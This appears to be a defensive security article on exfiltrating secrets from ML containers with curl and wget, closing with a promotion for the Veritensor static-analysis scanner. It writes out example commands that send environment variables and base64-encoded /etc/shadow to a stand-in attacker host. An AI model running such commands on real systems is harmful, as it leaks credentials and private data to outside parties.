Data Exfiltration via LoTL: Abusing Curl and Wget in ML Containers
Modern threat actors, upon achieving Remote Code Execution (RCE) within a CI/CD pipeline or an isolated Docker container, rarely risk downloading custom, compiled malware binaries. Instead, they rely heavily on "Living off the Land" (LotL) tactics—weaponizing legitimate, pre-installed system utilities to execute their objectives.
Within the context of Machine Learning infrastructure (where container images are notoriously bloated with extensive C-libraries and utilities), curl and wget are present in nearly all environments. These network utilities serve as the ideal vector for the rapid exfiltration of environment variables, configuration files, and access tokens.
The Architecture of Egress Exfiltration
When an adversary injects a payload (e.g., via a poisoned PyPI dependency or the exploitation of a Pickle deserialization vulnerability in a PyTorch model), the primary operational goal is to extract high-value secrets from the isolated environment and transmit them to an external Command and Control (C2) server.
Exfiltration via HTTP POST
The most robust method for transmitting multi-line secrets (such as RSA private keys or full environment variable dumps) is via an HTTP POST request, encapsulating the payload within the request body.
# Executing LotL data exfiltration via curl
# Extracting all environment variables and transmitting them to a remote webhook
curl -X POST [https://attacker-controlled-endpoint.com/ingest](https://attacker-controlled-endpoint.com/ingest) \
-H "Content-Type: text/plain" \
-d "$(env)"
Exfiltration via URI Parameters (HTTP GET)
If the infrastructure utilizes a Web Application Firewall (WAF) or egress proxy that blocks POST requests to unverified domains, attackers pivot to HTTP GET requests. By encoding the secrets directly into the URI query parameters, the exfiltration traffic mathematically resembles standard API polling, bypassing rudimentary anomaly detection heuristics.
# Extracting local shadow password hashes via wget and base64 encoding
PAYLOAD=$(cat /etc/shadow | base64 -w 0)
wget -qO- "[https://attacker-controlled-endpoint.com/pixel.gif?data=$PAYLOAD](https://attacker-controlled-endpoint.com/pixel.gif?data=$PAYLOAD)"
Static Analysis and Layer 7 Egress Filtering
Securing ML containers against LotL exfiltration requires a dual-layer architectural defense:
-
Network Egress Filtering (Layer 3/4): At the Kubernetes Network Policy or VPC Security Group level, all outbound traffic must be implicitly denied (Default Deny). Egress should only be permitted to strictly whitelisted domains (e.g., official PyPI mirrors, Hugging Face Hub, specific AWS S3 buckets).
-
AST Code Analysis (Layer 7): Infrastructure-as-Code (IaC), bash scripts, Jupyter Notebooks, and Python execution wrappers must be statically analyzed to detect anomalous invocations of system network utilities.
By integrating Veritensor into your CI/CD pipeline, you establish a powerful Abstract Syntax Tree (AST) analysis layer. The Veritensor engine statically evaluates invocations of curl and wget within os.system or subprocess.Popen calls. If the engine detects parameter concatenation with environment variables, the reading of sensitive OS paths (/etc/*, ~/.aws/), or outbound requests targeting known ephemeral webhook services, the build is flagged as critically vulnerable and deterministically halted.